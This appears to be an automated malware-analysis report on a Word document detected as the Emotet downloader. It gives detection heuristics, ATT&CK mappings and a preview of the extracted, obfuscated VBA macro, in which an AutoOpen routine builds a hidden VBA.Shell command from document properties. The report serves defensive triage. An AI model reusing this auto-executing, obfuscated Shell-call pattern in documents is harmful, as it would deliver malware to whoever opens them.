MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', strongly suggesting the Emotet family. Critical heuristics indicate the presence of VBA macros and a potential Shell call within them. The VBA script itself contains obfuscated code and a call to VBA.Shell, which is used to execute commands, likely for downloading and running a secondary payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
GZXRbMnBFDW = ("YUdLNPdUTE") VBA.Shell$ "" + hVmgnLh + pVKbAvrpy + swTrnwWusMe + EUGsMTxX + gRAKsxPVnf + erxzSKFkA + NWxBFZY + TSUGKhg + RtFcHGWsdfA + TDcCcaLs + ActiveDocument.CustomDocumentProperties("XkHMfWEK") + ActiveDocument.CustomDocumentProperties("TwYcAVpNE") + hVmgnLh + pVKbAvrpy + swTrnwWusMe + EUGsMTxX + gRAKsxPVnf + erxzSKFkA + NWxBFZY + TSUGKhg + RtFcHGWsdfA + TDcCcaLs + ActiveDocument.BuiltInDocumentProperties("Comments") + hVmgnLh + pVKbAvrpy + swTrnwWusMe + EUGsMTxX + gRAKsxPVnf + erxzSKFkA + NWxBFZY + TSUG … wLAuZRe = ("wmkSrAZCXW") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() bmbYfpBmGLg = ("szxGEkan") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4221 bytes |
SHA-256: 759017911c08ebd4401004602d122aa93b5200113cc8d63a77fd2ed1fd80b0b4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
97 of 128 identifiers look randomly generated (e.g. 'edyWvrNXckzLbePVhEcywRyBugbUHaCXkmCSATkS') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
'PHMKstTspDsyFTWKvsnZpCDhymcMNDTgXpgNedszAcnagxpxcWyteyzkDveF
'anNUstVXeHDUVZndWsgSfSWLrmfmLGKwLYnnRLHbaFhFLSaatBYfgGDyZggRTTUFDVSK
'AmugWhBnFENKawngmRehhXYaXtvPypRCCDHAzpabLBftfWNGsPYTrHxkBCAKHSHeuZ
'KVrWuuxEzwKxMKPLCaweRexMxEFdDXWuAPGPdeMMEbWwSZrkmBUrwPgwSHBeHkfeH
'MDrAVBMawfSRVPMczUhedUaLVUBUsTBasXUnbPWMkHebfSFxvssMZKBUwkfxWbKaS
'cGyGwDYvTtYGHDhvaePLmxSPzAsvuhdyvUBzSKepHBmpkSmPdwuUcneSVvaF
'bbacLxAeGvybFrfALEErsffYbCGgAYAhEdwxZnAyMerGBLwCgxYkAcNfGbCFPrFu
'ZgHZwwvVHpXLGKLckySfATAFfSxntWapRPnBZkndPbBusMdPEThWzuAeH
'gcaWZRWcazUemsvmzwerFTtaFFFUVKzBWMCGMCNSmhsYPNFaFxmewCsMvFSCdrZ
'GgCFDhRSweWHrChmSHeaBuEPKaznAXMueZZaBmLMzruYYsRXfhNHeWaZwmrgtN
'eBtmusKBwtMnBwmBtEsCmvHgEgwbZkAXmuBbrYVSMWvrXMsVcnAhbeMVYH
'GFZxLxYsDCELWZULtSVDsTYUCVkAdUWTLXLTwbstfCwLzBWMrXgHNcdU
'EYZweFyghbUEBSuBcyFEKapWDTTYKXYuhtfnKGTPhtRSSSfmLyUefuLnYthTfvE
'dkVwfEHpuTetegfGALcmtExDGaaZfRDkDGsrLcrMAnmbVCbSgentRBgLSDXzC
Function eymEyBgaPgx()
aHaydwcPsts = ("sMFpMdP")
HPVZvBWfsb = ("CWbpTetTRHN")
EmgHYCTEHT = ("xZbUnhcVCL")
rzEPfzVhB = ("cNggvkZ")
LzYAyWhc = ("fCPfgEGDcT")
atttvuU = ("YEdhCLpLwn")
wFGHdFu = ("mnWxeMU")
WuSNfTKVSL = ("NApNhhK")
USUFRSw = ("tdLtHTLF")
GZXRbMnBFDW = ("YUdLNPdUTE")
VBA.Shell$ "" + hVmgnLh + pVKbAvrpy + swTrnwWusMe + EUGsMTxX + gRAKsxPVnf + erxzSKFkA + NWxBFZY + TSUGKhg + RtFcHGWsdfA + TDcCcaLs + ActiveDocument.CustomDocumentProperties("XkHMfWEK") + ActiveDocument.CustomDocumentProperties("TwYcAVpNE") + hVmgnLh + pVKbAvrpy + swTrnwWusMe + EUGsMTxX + gRAKsxPVnf + erxzSKFkA + NWxBFZY + TSUGKhg + RtFcHGWsdfA + TDcCcaLs + ActiveDocument.BuiltInDocumentProperties("Comments") + hVmgnLh + pVKbAvrpy + swTrnwWusMe + EUGsMTxX + gRAKsxPVnf + erxzSKFkA + NWxBFZY + TSUGKhg + RtFcHGWsdfA + TDcCcaLs + ygsAbUKKc, 0
wLAuZRe = ("wmkSrAZCXW")
LDmECaUgCV = ("UHLztfWmf")
fYCVszf = ("DEzgzVdkaFW")
PFUgpErxpMV = ("VdnuFYres")
TwUgfErX = ("PgXhcufcxW")
rzyubVzdfEb = ("dcZxTCadEtK")
aEGLZsZ = ("hSaWbDCurMu")
KKEhbvBdEmR = ("drHWgznKtg")
YxxvVXhAg = ("UfRKWvSDt")
EyeeWSpm = ("LXyDamaLC")
End Function
'gzwWEkZTvMtACSzcDNHRPpFyvsChhwKtugPAnUxBxSrVgThUzFvKwcYYFNzeXeV
'GAgYnvkyddwmbMWMHMDUahdgYUKuFYZhathDkAUYuswbHrPtcnpLeaxYnWpZwYpCtYW
'DeDrSvGWbaasVgugMNdXEARRKsUtKETtcmkHnNkNTKeDHYcdwdLWrMhPhstvru
'SxHyWttHxKRfGHYkHHybdMxcDeBKATcvaKygBBSaBaZLGRWMkvevmNXCcBKrLaaXSnr
'fGPSzMwznazkLxmMvFMuaXTmnhmmrsduxvCaUSWwTdLbEhrRhTRrcarYZVt
'fPsbxThNUzGCHCDhMaYwGCcpDvEvrHYtsckpwzTXwndzsTxtBSBNCkyTYwHbVgL
'xkLYusFYdnSkguNYWXbtGAUZRWtcbpMCRDEaTxzmuTYyNvkEhuPWVwanRhSYc
'CcTzLfxumWCrdMwurGFGMnUKtvzfgFshMHGBvxhpbTgGZYBEhUthHHkWKgYfFafNf
'hHACtTKfTbTuGBumtRUVWRfvALyvvDkaSXtrNUtyeccdUSHyLtHCAgGcRSvtv
'eRnkZKgEYctrwyMvsphnZNDSANexbxYSSEZGFBKXrRTtzaSBeYgBDyustnhvkMSnr
'edyWvrNXckzLbePVhEcywRyBugbUHaCXkmCSATkSXBaDXzHwbCYwrmeTZbvemMgBzzLSXA
'RDfCekZtpUUdPUaNrHXtwhWnkrWWMgCPBBhTceRumhmuBkPzLEaUmEzwAzTNAEPeZzDS
'TvYwVhXGRxukxvkvzZuFXCWkbZwurgwGvLCsRSTeDApsGShwsAEppvBshLtDcnyTUw
'VcAbBgPmNYDgkZxSkKrWuKMVMDgrbdaCDbbzaAkkpTvkePCnmerRExZfttuPDxV
'vxfKDdUFMVZbCFVfrbDSXewfaFkZeEkSGWAdyBDYdeKRvVTGkePPPMXvfGbMMgWa
'FyMwGxeLvekDcxUEWTUGphfyVcZVpPhYuVfwVAdCeNRvhaxhKLwPagZrEmnbve
'XLUKNwwmEbkGfMpXvHvtgvBcPPheZeFNLULHgExHwzUChzKrwTZnrcmWKptbfUzP
'fHmdWkwdezUWhkxLRbymHBGKmXBKKyMEUphhZdTUMkAkauyLwbfdHETDgRssTPV
'TfRsbHmdWCbrdTZTwpeRpGznfWBECuZHCmXTFUZgsmCpZvGwVwUSzZShmU
'GMFNHhYKewWAYxzSyaHWxVGMkfdkDtzybhASkDRzpKtZMCPRbuFuKektu
'gMWCgfZFMhgPstcYKEdYLPwwPawBurxpWgdTwmdDFHYxhEkrfkdFvPdvTxDWA
'LvMAWxaPhVUABDFrZHaSBnVztnfRKvGEgDmAMcGaPgXeGXMWSwKbXzmmvRWCVMgdRHNYt
'YCXmuUuTakvUCDSFrrfEmmHhyzgDMehskPtVbCFFMhchYAeLxwdtepscBGPAcdRnhL
Sub autoopen()
bmbYfpBmGLg = ("szxGEkan")
YGbeAhbARK = ("TzUgtFA")
XyRMUmcT = ("gFHHZrF")
dLenDGfVk = ("vEhpsUKf")
mUmLzpVU = ("kWzkWZXmT")
bSaAcLn = ("seZApyRSs")
eymEyBgaPgx
fAVuBTpeL = ("HyWcbtFkdE")
wPKXYua = ("kgMPhgAbW")
mCXavzy = ("wWBfzpfdmv")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.